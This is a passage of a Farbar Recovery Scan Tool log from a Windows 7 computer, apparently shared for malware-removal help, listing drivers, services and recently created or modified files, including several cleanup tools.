S3 WwanSvc; C:\Windows\System32\wwansvc.dll [228864 2014-01-27] (Microsoft Corporation) [File not signed]
S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [X]
S4 McciServiceHost; "C:\Program Files (x86)\Common Files\Motive\McciServiceHost.exe" [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 1394ohci; C:\Windows\system32\drivers\1394ohci.sys [229888 2010-11-20] (Microsoft Corporation) [File not signed]
S3 AcpiPmi; C:\Windows\system32\drivers\acpipmi.sys [12800 2010-11-20] (Microsoft Corporation) [File not signed]
R1 AFD; C:\Windows\system32\drivers\afd.sys [497152 2014-05-30] (Microsoft Corporation) [File not signed]
R3 AgereSoftModem; C:\Windows\System32\DRIVERS\agrsm64.sys [1212416 2010-01-26] (LSI Corporation) [File not signed]
S3 AmdK8; C:\Windows\system32\DRIVERS\amdk8.sys [64512 2009-07-13] (Microsoft Corporation) [File not signed]
S3 AmdPPM; C:\Windows\system32\DRIVERS\amdppm.sys [60928 2009-07-13] (Microsoft Corporation) [File not signed]
S3 AppID; C:\Windows\system32\drivers\appid.sys [61440 2010-11-20] (Microsoft Corporation) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation) [File not signed]
S3 AsyncMac; C:\Windows\System32\DRIVERS\asyncmac.sys [23040 2009-07-13] (Microsoft Corporation) [File not signed]
S3 b06bdrv; C:\Windows\system32\DRIVERS\bxvbda.sys [468480 2009-06-10] (Broadcom Corporation) [File not signed]
S3 b57nd60a; C:\Windows\System32\DRIVERS\b57nd60a.sys [270848 2009-06-10] (Broadcom Corporation) [File not signed]
R1 Beep; C:\Windows\System32\Drivers\Beep.sys [6656 2009-07-13] (Microsoft Corporation) [File not signed]
R1 blbdrive; C:\Windows\system32\DRIVERS\blbdrive.sys [45056 2009-07-13] (Microsoft Corporation) [File not signed]
R3 bowser; C:\Windows\System32\DRIVERS\bowser.sys [90624 2011-02-22] (Microsoft Corporation) [File not signed]
S3 BrFiltLo; C:\Windows\system32\DRIVERS\BrFiltLo.sys [18432 2009-06-10] (Brother Industries, Ltd.) [File not signed]
S3 BrFiltUp; C:\Windows\system32\DRIVERS\BrFiltUp.sys [8704 2009-06-10] (Brother Industries, Ltd.) [File not signed]
S3 BridgeMP; C:\Windows\System32\DRIVERS\bridge.sys [95232 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Brserid; C:\Windows\System32\Drivers\Brserid.sys [286720 2009-07-13] (Brother Industries Ltd.) [File not signed]
S3 BrSerWdm; C:\Windows\System32\Drivers\BrSerWdm.sys [47104 2009-06-10] (Brother Industries Ltd.) [File not signed]
S3 BrUsbMdm; C:\Windows\System32\Drivers\BrUsbMdm.sys [14976 2009-06-10] (Brother Industries Ltd.) [File not signed]
S3 BrUsbSer; C:\Windows\System32\Drivers\BrUsbSer.sys [14720 2009-06-10] (Brother Industries Ltd.) [File not signed]
S3 BTHMODEM; C:\Windows\system32\DRIVERS\bthmodem.sys [72192 2009-07-13] (Microsoft Corporation) [File not signed]
S4 cdfs; C:\Windows\System32\DRIVERS\cdfs.sys [92160 2009-07-13] (Microsoft Corporation) [File not signed]
R1 cdrom; C:\Windows\system32\drivers\cdrom.sys [147456 2010-11-20] (Microsoft Corporation) [File not signed]
S3 circlass; C:\Windows\system32\DRIVERS\circlass.sys [45568 2009-07-13] (Microsoft Corporation) [File not signed]
S3 CmBatt; C:\Windows\system32\DRIVERS\CmBatt.sys [17664 2009-07-13] (Microsoft Corporation) [File not signed]
R3 CompositeBus; C:\Windows\system32\drivers\CompositeBus.sys [38912 2010-11-20] (Microsoft Corporation) [File not signed]
R1 DfsC; C:\Windows\System32\Drivers\dfsc.sys [102400 2010-11-20] (Microsoft Corporation) [File not signed]
R1 discache; C:\Windows\System32\drivers\discache.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 drmkaud; C:\Windows\system32\drivers\drmkaud.sys [5632 2009-07-13] (Microsoft Corporation) [File not signed]
R3 dsNcAdpt; C:\Windows\System32\DRIVERS\dsNcAdpt.sys [36816 2013-11-21] (Juniper Networks) [File not signed]
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation) [File not signed]
S3 ErrDev; C:\Windows\system32\drivers\errdev.sys [9728 2009-07-13] (Microsoft Corporation) [File not signed]
S3 exfat; C:\Windows\System32\Drivers\exfat.sys [195072 2009-07-13] (Microsoft Corporation) [File not signed]
S3 fastfat; C:\Windows\System32\Drivers\fastfat.sys [204800 2009-07-13] (Microsoft Corporation) [File not signed]
S3 fdc; C:\Windows\system32\DRIVERS\fdc.sys [29696 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Filetrace; C:\Windows\System32\drivers\filetrace.sys [34304 2009-07-13] (Microsoft Corporation) [File not signed]
S3 flpydisk; C:\Windows\system32\DRIVERS\flpydisk.sys [24576 2009-07-13] (Microsoft Corporation) [File not signed]
S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir.sys [31232 2009-06-10] (Hauppauge Computer Works, Inc.) [File not signed]
R3 HDAudBus; C:\Windows\system32\drivers\HDAudBus.sys [122368 2010-11-20] (Microsoft Corporation) [File not signed]
S3 HidBatt; C:\Windows\system32\DRIVERS\HidBatt.sys [26624 2009-07-13] (Microsoft Corporation) [File not signed]
S3 HidBth; C:\Windows\system32\DRIVERS\hidbth.sys [100864 2009-07-13] (Microsoft Corporation) [File not signed]
S3 HidIr; C:\Windows\system32\DRIVERS\hidir.sys [46592 2009-07-13] (Microsoft Corporation) [File not signed]
R3 HidUsb; C:\Windows\System32\DRIVERS\hidusb.sys [30208 2010-11-20] (Microsoft Corporation) [File not signed]
S3 HTCAND64; C:\Windows\System32\Drivers\ANDROIDUSB.sys [33736 2009-11-02] (HTC, Corporation) [File not signed]
R3 HTTP; C:\Windows\System32\drivers\HTTP.sys [753664 2010-11-20] (Microsoft Corporation) [File not signed]
S3 i8042prt; C:\Windows\system32\drivers\i8042prt.sys [105472 2009-07-13] (Microsoft Corporation) [File not signed]
R3 igfx; C:\Windows\System32\DRIVERS\igdkmd64.sys [6177472 2009-09-11] (Intel Corporation) [File not signed]
R2 ImmunetNetworkMonitorDriver; C:\Windows\System32\Drivers\ImmunetNetworkMonitor.sys [100048 2014-09-03] (Sourcefire, Inc.)
R1 ImmunetProtectDriver; C:\Windows\System32\Drivers\immunetprotect.sys [58064 2014-09-03] (Windows ® Win 7 DDK provider)
R1 ImmunetSelfProtectDriver; C:\Windows\System32\Drivers\immunetselfprotect.sys [32976 2014-09-03] (Windows ® Win 7 DDK provider)
R3 intelppm; C:\Windows\system32\DRIVERS\intelppm.sys [62464 2009-07-13] (Microsoft Corporation) [File not signed]
S3 IpFilterDriver; C:\Windows\System32\DRIVERS\ipfltdrv.sys [82944 2010-11-20] (Microsoft Corporation) [File not signed]
S3 IPMIDRV; C:\Windows\system32\drivers\IPMIDrv.sys [78848 2010-11-20] (Microsoft Corporation) [File not signed]
S3 IPNAT; C:\Windows\System32\drivers\ipnat.sys [116224 2009-07-13] (Microsoft Corporation) [File not signed]
S3 IRENUM; C:\Windows\System32\drivers\irenum.sys [17920 2009-07-13] (Microsoft Corporation) [File not signed]
R3 kbdhid; C:\Windows\System32\DRIVERS\kbdhid.sys [33280 2010-11-20] (Microsoft Corporation) [File not signed]
R3 ksthunk; C:\Windows\system32\drivers\ksthunk.sys [20992 2009-07-13] (Microsoft Corporation) [File not signed]
R2 lltdio; C:\Windows\System32\DRIVERS\lltdio.sys [60928 2009-07-13] (Microsoft Corporation) [File not signed]
R2 luafv; C:\Windows\system32\drivers\luafv.sys [113152 2009-07-13] (Microsoft Corporation) [File not signed]
S3 LVPr2M64; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30232 2009-10-07] ()
S3 LVPr2Mon; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30232 2009-10-07] ()
R3 Modem; C:\Windows\System32\drivers\modem.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
R3 monitor; C:\Windows\System32\DRIVERS\monitor.sys [30208 2009-07-13] (Microsoft Corporation) [File not signed]
R3 mouhid; C:\Windows\System32\DRIVERS\mouhid.sys [31232 2009-07-13] (Microsoft Corporation) [File not signed]
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [189440 2011-04-18] (Microsoft Corporation)
R3 mpsdrv; C:\Windows\System32\drivers\mpsdrv.sys [77312 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MREMP50a64; C:\Program Files\Common Files\Motive\MREMP50a64.SYS [43008 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA))
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50a64; C:\Program Files\Common Files\Motive\MRESP50a64.SYS [40960 2010-07-27] (Printing Communications Assoc., Inc. (PCAUSA))
S3 MRxDAV; C:\Windows\system32\drivers\mrxdav.sys [140800 2013-07-04] (Microsoft Corporation) [File not signed]
R3 mrxsmb; C:\Windows\System32\DRIVERS\mrxsmb.sys [158208 2011-04-26] (Microsoft Corporation) [File not signed]
R3 mrxsmb10; C:\Windows\System32\DRIVERS\mrxsmb10.sys [288768 2011-07-08] (Microsoft Corporation) [File not signed]
R3 mrxsmb20; C:\Windows\System32\DRIVERS\mrxsmb20.sys [128000 2011-04-26] (Microsoft Corporation) [File not signed]
R1 Msfs; C:\Windows\System32\Drivers\Msfs.sys [26112 2009-07-13] (Microsoft Corporation) [File not signed]
S3 mshidkmdf; C:\Windows\System32\drivers\mshidkmdf.sys [8192 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSKSSRV; C:\Windows\System32\drivers\MSKSSRV.sys [11136 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSPCLOCK; C:\Windows\System32\drivers\MSPCLOCK.sys [7168 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSPQM; C:\Windows\System32\drivers\MSPQM.sys [6784 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSTEE; C:\Windows\System32\drivers\MSTEE.sys [8064 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MTConfig; C:\Windows\system32\DRIVERS\MTConfig.sys [15360 2009-07-13] (Microsoft Corporation) [File not signed]
S3 NativeWifiP; C:\Windows\System32\DRIVERS\nwifi.sys [318976 2009-07-13] (Microsoft Corporation) [File not signed]
S3 NdisCap; C:\Windows\System32\DRIVERS\ndiscap.sys [35328 2009-07-13] (Microsoft Corporation) [File not signed]
R3 NdisTapi; C:\Windows\System32\DRIVERS\ndistapi.sys [24064 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Ndisuio; C:\Windows\System32\DRIVERS\ndisuio.sys [56832 2010-11-20] (Microsoft Corporation) [File not signed]
R3 NdisWan; C:\Windows\System32\DRIVERS\ndiswan.sys [164352 2010-11-20] (Microsoft Corporation) [File not signed]
R3 NDProxy; C:\Windows\System32\Drivers\NDProxy.sys [57856 2010-11-20] (Microsoft Corporation) [File not signed]
R1 NetBIOS; C:\Windows\System32\DRIVERS\netbios.sys [44544 2009-07-13] (Microsoft Corporation) [File not signed]
R1 NetBT; C:\Windows\System32\DRIVERS\netbt.sys [261632 2010-11-20] (Microsoft Corporation) [File not signed]
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [84864 2011-04-27] (Microsoft Corporation)
R1 Npfs; C:\Windows\System32\Drivers\Npfs.sys [44032 2009-07-13] (Microsoft Corporation) [File not signed]
R1 nsiproxy; C:\Windows\System32\drivers\nsiproxy.sys [24576 2009-07-13] (Microsoft Corporation) [File not signed]
R1 Null; C:\Windows\System32\Drivers\Null.sys [6144 2009-07-13] (Microsoft Corporation) [File not signed]
S3 ohci1394; C:\Windows\system32\drivers\ohci1394.sys [72832 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Parport; C:\Windows\system32\DRIVERS\parport.sys [97280 2009-07-13] (Microsoft Corporation) [File not signed]
R2 PEAUTH; C:\Windows\System32\drivers\peauth.sys [651264 2009-07-13] (Microsoft Corporation) [File not signed]
R3 PptpMiniport; C:\Windows\System32\DRIVERS\raspptp.sys [111104 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Processor; C:\Windows\system32\DRIVERS\processr.sys [60416 2009-07-13] (Microsoft Corporation) [File not signed]
R1 Psched; C:\Windows\System32\DRIVERS\pacer.sys [131584 2010-11-20] (Microsoft Corporation) [File not signed]
S3 QWAVEdrv; C:\Windows\system32\drivers\qwavedrv.sys [46592 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RasAcd; C:\Windows\System32\DRIVERS\rasacd.sys [14848 2009-07-13] (Microsoft Corporation) [File not signed]
R3 RasAgileVpn; C:\Windows\System32\DRIVERS\AgileVpn.sys [60416 2009-07-13] (Microsoft Corporation) [File not signed]
R3 Rasl2tp; C:\Windows\System32\DRIVERS\rasl2tp.sys [129536 2010-11-20] (Microsoft Corporation) [File not signed]
R3 RasPppoe; C:\Windows\System32\DRIVERS\raspppoe.sys [92672 2009-07-13] (Microsoft Corporation) [File not signed]
R3 RasSstp; C:\Windows\System32\DRIVERS\rassstp.sys [83968 2009-07-13] (Microsoft Corporation) [File not signed]
R1 rdbss; C:\Windows\System32\DRIVERS\rdbss.sys [309248 2010-11-20] (Microsoft Corporation) [File not signed]
S3 rdpbus; C:\Windows\system32\DRIVERS\rdpbus.sys [24064 2009-07-13] (Microsoft Corporation) [File not signed]
R1 RDPCDD; C:\Windows\System32\DRIVERS\RDPCDD.sys [7680 2009-07-13] (Microsoft Corporation) [File not signed]
R1 RDPENCDD; C:\Windows\System32\drivers\rdpencdd.sys [7680 2009-07-13] (Microsoft Corporation) [File not signed]
R1 RDPREFMP; C:\Windows\System32\drivers\rdprefmp.sys [8192 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RdpVideoMiniport; C:\Windows\System32\drivers\rdpvideominiport.sys [19456 2012-08-23] (Microsoft Corporation) [File not signed]
S3 RDPWD; C:\Windows\System32\Drivers\RDPWD.sys [210944 2012-04-27] (Microsoft Corporation) [File not signed]
R2 rspndr; C:\Windows\System32\DRIVERS\rspndr.sys [76800 2009-07-13] (Microsoft Corporation) [File not signed]
R3 RTL8167; C:\Windows\System32\DRIVERS\Rt64win7.sys [233472 2009-07-13] (Realtek                                            ) [File not signed]
S3 scfilter; C:\Windows\System32\DRIVERS\scfilter.sys [29696 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Serenum; C:\Windows\system32\DRIVERS\serenum.sys [23552 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Serial; C:\Windows\system32\DRIVERS\serial.sys [94208 2009-07-13] (Microsoft Corporation) [File not signed]
S3 sermouse; C:\Windows\system32\DRIVERS\sermouse.sys [26624 2009-07-13] (Microsoft Corporation) [File not signed]
S3 sffdisk; C:\Windows\system32\drivers\sffdisk.sys [14336 2009-07-13] (Microsoft Corporation) [File not signed]
S3 sffp_mmc; C:\Windows\system32\drivers\sffp_mmc.sys [13824 2009-07-13] (Microsoft Corporation) [File not signed]
S3 sffp_sd; C:\Windows\system32\drivers\sffp_sd.sys [14336 2010-11-20] (Microsoft Corporation) [File not signed]
S3 sfloppy; C:\Windows\system32\DRIVERS\sfloppy.sys [16896 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Smb; C:\Windows\System32\DRIVERS\smb.sys [93184 2009-07-13] (Microsoft Corporation) [File not signed]
R3 srv; C:\Windows\System32\DRIVERS\srv.sys [467456 2011-04-28] (Microsoft Corporation) [File not signed]
R3 srv2; C:\Windows\System32\DRIVERS\srv2.sys [410112 2011-04-28] (Microsoft Corporation) [File not signed]
R3 srvnet; C:\Windows\System32\DRIVERS\srvnet.sys [168448 2011-04-28] (Microsoft Corporation) [File not signed]
R2 tcpipreg; C:\Windows\System32\drivers\tcpipreg.sys [45568 2012-10-03] (Microsoft Corporation) [File not signed]
S3 TDPIPE; C:\Windows\System32\drivers\tdpipe.sys [15872 2009-07-13] (Microsoft Corporation) [File not signed]
S3 TDTCP; C:\Windows\System32\drivers\tdtcp.sys [23552 2012-02-16] (Microsoft Corporation) [File not signed]
R1 tdx; C:\Windows\System32\DRIVERS\tdx.sys [119296 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Trufos; C:\Windows\System32\Drivers\trufos.sys [329800 2014-09-03] (BitDefender S.R.L.)
S3 tssecsrv; C:\Windows\System32\DRIVERS\tssecsrv.sys [39936 2013-06-14] (Microsoft Corporation) [File not signed]
S3 TsUsbFlt; C:\Windows\System32\drivers\tsusbflt.sys [57856 2012-08-23] (Microsoft Corporation) [File not signed]
R3 tunnel; C:\Windows\System32\DRIVERS\tunnel.sys [125440 2010-11-20] (Microsoft Corporation) [File not signed]
S4 udfs; C:\Windows\System32\DRIVERS\udfs.sys [328192 2010-11-20] (Microsoft Corporation) [File not signed]
R3 umbus; C:\Windows\system32\drivers\umbus.sys [48640 2010-11-20] (Microsoft Corporation) [File not signed]
S3 UmPass; C:\Windows\system32\DRIVERS\umpass.sys [9728 2009-07-13] (Microsoft Corporation) [File not signed]
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2012-12-13] (Apple, Inc.) [File not signed]
R3 usbccgp; C:\Windows\System32\DRIVERS\usbccgp.sys [99840 2013-11-26] (Microsoft Corporation) [File not signed]
S3 usbcir; C:\Windows\system32\drivers\usbcir.sys [100864 2013-07-12] (Microsoft Corporation) [File not signed]
R3 usbehci; C:\Windows\System32\DRIVERS\usbehci.sys [53248 2013-11-26] (Microsoft Corporation) [File not signed]
R3 usbhub; C:\Windows\System32\DRIVERS\usbhub.sys [343040 2013-11-26] (Microsoft Corporation) [File not signed]
S3 usbohci; C:\Windows\system32\drivers\usbohci.sys [25600 2013-11-26] (Microsoft Corporation) [File not signed]
R3 usbprint; C:\Windows\System32\DRIVERS\usbprint.sys [25088 2009-07-13] (Microsoft Corporation) [File not signed]
R3 usbscan; C:\Windows\system32\drivers\usbscan.sys [42496 2013-07-02] (Microsoft Corporation) [File not signed]
R3 USBSTOR; C:\Windows\System32\DRIVERS\USBSTOR.SYS [91648 2011-03-10] (Microsoft Corporation) [File not signed]
R3 usbuhci; C:\Windows\System32\DRIVERS\usbuhci.sys [30720 2013-11-26] (Microsoft Corporation) [File not signed]
S3 vga; C:\Windows\System32\DRIVERS\vgapnp.sys [29184 2009-07-13] (Microsoft Corporation) [File not signed]
R1 VgaSave; C:\Windows\System32\drivers\vga.sys [29184 2009-07-13] (Microsoft Corporation) [File not signed]
S3 vwifibus; C:\Windows\System32\drivers\vwifibus.sys [24576 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WacomPen; C:\Windows\system32\DRIVERS\wacompen.sys [27776 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WANARP; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2010-11-20] (Microsoft Corporation) [File not signed]
R1 Wanarpv6; C:\Windows\System32\DRIVERS\wanarp.sys [88576 2010-11-20] (Microsoft Corporation) [File not signed]
R1 WfpLwf; C:\Windows\System32\DRIVERS\wfplwf.sys [12800 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WinUsb; C:\Windows\System32\DRIVERS\WinUsb.sys [41984 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WmiAcpi; C:\Windows\system32\drivers\wmiacpi.sys [14336 2009-07-13] (Microsoft Corporation) [File not signed]
R1 ws2ifsl; C:\Windows\system32\drivers\ws2ifsl.sys [21504 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WudfPf; C:\Windows\System32\drivers\WudfPf.sys [87040 2012-07-25] (Microsoft Corporation) [File not signed]
R3 WUDFRd; C:\Windows\System32\DRIVERS\WUDFRd.sys [198656 2012-07-25] (Microsoft Corporation) [File not signed]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U2 CVPNDrv; No ImagePath
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-30 15:31 - 2014-09-30 15:32 - 00047642 _____ () C:\Users\Camille\Desktop\FRST.txt
2014-09-30 15:31 - 2014-09-30 15:31 - 00000000 ____D () C:\FRST
2014-09-30 15:30 - 2014-09-30 15:30 - 02108928 _____ (Farbar) C:\Users\Camille\Desktop\FRST64.exe
2014-09-30 06:52 - 2014-09-30 06:52 - 00000000 ____D () C:\Program Files (x86)\Citrix
2014-09-29 10:38 - 2014-09-29 10:38 - 01373475 _____ () C:\Users\Camille\Desktop\adwcleaner_3.310.exe
2014-09-25 11:31 - 2014-09-25 11:31 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-09-25 11:20 - 2014-09-25 11:20 - 00019196 _____ () C:\Users\Camille\Desktop\dds.txt
2014-09-25 11:20 - 2014-09-25 11:20 - 00017588 _____ () C:\Users\Camille\Desktop\attach.txt
2014-09-24 09:00 - 2014-09-24 09:24 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-24 08:38 - 2014-09-24 08:39 - 00043073 _____ () C:\Users\Camille\Downloads\Result.txt
2014-09-24 08:34 - 2014-09-24 08:35 - 00002912 _____ () C:\Users\Camille\Downloads\FSS.txt
2014-09-23 11:21 - 2014-09-30 15:10 - 00000000 ____D () C:\Users\Camille\Desktop\Troubleshooting
2014-09-23 11:09 - 2014-09-23 11:09 - 00000000 ____D () C:\MGADiagToolOutput
2014-09-23 10:58 - 2014-09-23 10:58 - 02031992 _____ (Microsoft Corporation) C:\Users\Camille\Downloads\MGADiag(1).exe
2014-09-23 10:41 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-23 10:41 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-23 10:41 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-23 10:41 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-23 10:40 - 2014-09-23 10:52 - 00000000 ___SD () C:\ComboFix
2014-09-23 10:33 - 2014-09-23 10:41 - 00000000 ____D () C:\Qoobox
2014-09-23 10:31 - 2014-09-23 10:52 - 00000000 ____D () C:\Windows\erdnt
2014-09-23 10:31 - 2014-09-23 10:41 - 00000000 ___SD () C:\32788R22FWJFW
2014-09-23 10:22 - 2014-09-23 10:22 - 00000000 ____D () C:\Windows\ERUNT
2014-09-21 21:28 - 2014-09-30 15:24 - 00000000 ____D () C:\AdwCleaner
2014-09-21 21:28 - 2014-09-21 21:28 - 01373475 _____ () C:\Users\Camille\Downloads\AdwCleaner(1).exe
2014-09-21 21:21 - 2014-09-21 21:21 - 00000184 _____ () C:\Windows\wininit.ini
2014-09-21 21:10 - 2014-09-21 21:10 - 00001176 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-09-21 21:10 - 2014-09-21 21:10 - 00000000 ____D () C:\Users\Camille\AppData\Roaming\TeamViewer
2014-09-21 21:10 - 2014-09-21 21:10 - 00000000 ____D () C:\Program Files (x86)\TeamViewer
2014-09-21 21:00 - 2014-09-21 21:00 - 00000000 ____D () C:\ProgramData\Office Genuine Advantage
2014-09-21 20:52 - 2014-09-21 20:52 - 00001393 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-09-21 20:52 - 2014-09-21 20:52 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-09-21 20:52 - 2014-09-21 20:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-09-21 20:51 - 2014-09-24 08:19 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-09-21 20:51 - 2014-09-21 21:08 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-09-21 20:51 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-09-21 20:50 - 2014-09-21 20:51 - 00000000 ____D () C:\Windows\softwaredistribution.old
2014-09-21 20:30 - 2014-09-21 20:30 - 00000000 ____D () C:\Users\Camille\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HiJackThis
2014-09-21 20:30 - 2014-09-21 20:30 - 00000000 ____D () C:\Program Files (x86)\Trend Micro
2014-09-03 13:15 - 2014-09-03 13:15 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-03 13:13 - 2014-09-03 13:13 - 05952624 _____ ( ) C:\Users\Camille\Downloads\adblockplusie-1.2.exe
2014-09-03 13:10 - 2014-09-28 03:00 - 00000296 _____ () C:\Windows\Tasks\Immunet Scan 599667.job
2014-09-03 13:10 - 2014-09-03 13:10 - 00003214 _____ () C:\Windows\System32\Tasks\Immunet Scan 599667
2014-09-03 13:09 - 2014-09-30 15:32 - 00000000 ____D () C:\Program Files\Immunet
2014-09-03 13:09 - 2014-09-03 13:10 - 00000000 ____D () C:\ProgramData\Immunet
2014-09-03 13:09 - 2014-09-03 13:09 - 00329800 _____ (BitDefender S.R.L.) C:\Windows\system32\Drivers\trufos.sys
2014-09-03 13:09 - 2014-09-03 13:09 - 00100048 _____ (Sourcefire, Inc.) C:\Windows\system32\Drivers\ImmunetNetworkMonitor.sys
2014-09-03 13:09 - 2014-09-03 13:09 - 00058064 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\immunetprotect.sys
2014-09-03 13:09 - 2014-09-03 13:09 - 00032976 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\immunetselfprotect.sys
2014-09-03 13:09 - 2014-09-03 13:09 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_Kernel_ImmunetNetworkMonitor_01009.Wdf
2014-09-03 13:09 - 2014-09-03 13:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immunet 3
2014-09-03 12:36 - 2014-09-30 15:25 - 00020982 _____ () C:\Windows\PFRO.log
2014-09-03 12:25 - 2014-09-24 09:00 - 00128728 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-03 12:25 - 2014-09-24 08:59 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-03 12:25 - 2014-09-03 12:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-03 12:25 - 2014-09-03 12:25 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-03 12:25 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-02 17:32 - 2014-09-30 15:25 - 00001732 _____ () C:\Windows\setupact.log
2014-09-02 17:32 - 2014-09-21 21:29 - 00458432 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-02 17:32 - 2014-09-02 17:32 - 00000000 _____ () C:\Windows\setuperr.log
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-30 15:29 - 2009-10-27 14:56 - 01353069 _____ () C:\Windows\WindowsUpdate.log
2014-09-30 15:25 - 2012-09-16 19:12 - 00000368 ____H () C:\Windows\Tasks\CodecUpdaterTask{411074B9-B811-4A10-8192-EC966734D16B}.job
2014-09-30 15:25 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-30 14:40 - 2014-02-20 18:50 - 00000542 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3148415299-674671827-1884196446-1000.job
2014-09-30 14:36 - 2012-06-07 17:14 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-30 06:52 - 2014-02-20 18:50 - 00003572 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3148415299-674671827-1884196446-1000
2014-09-29 05:04 - 2009-07-13 23:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-29 05:04 - 2009-07-13 23:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-28 14:50 - 2013-11-14 01:38 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2014-09-28 03:00 - 2014-04-17 21:23 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-09-27 10:45 - 2014-03-30 11:35 - 00348672 ___SH () C:\Users\Camille\Documents\Thumbs.db
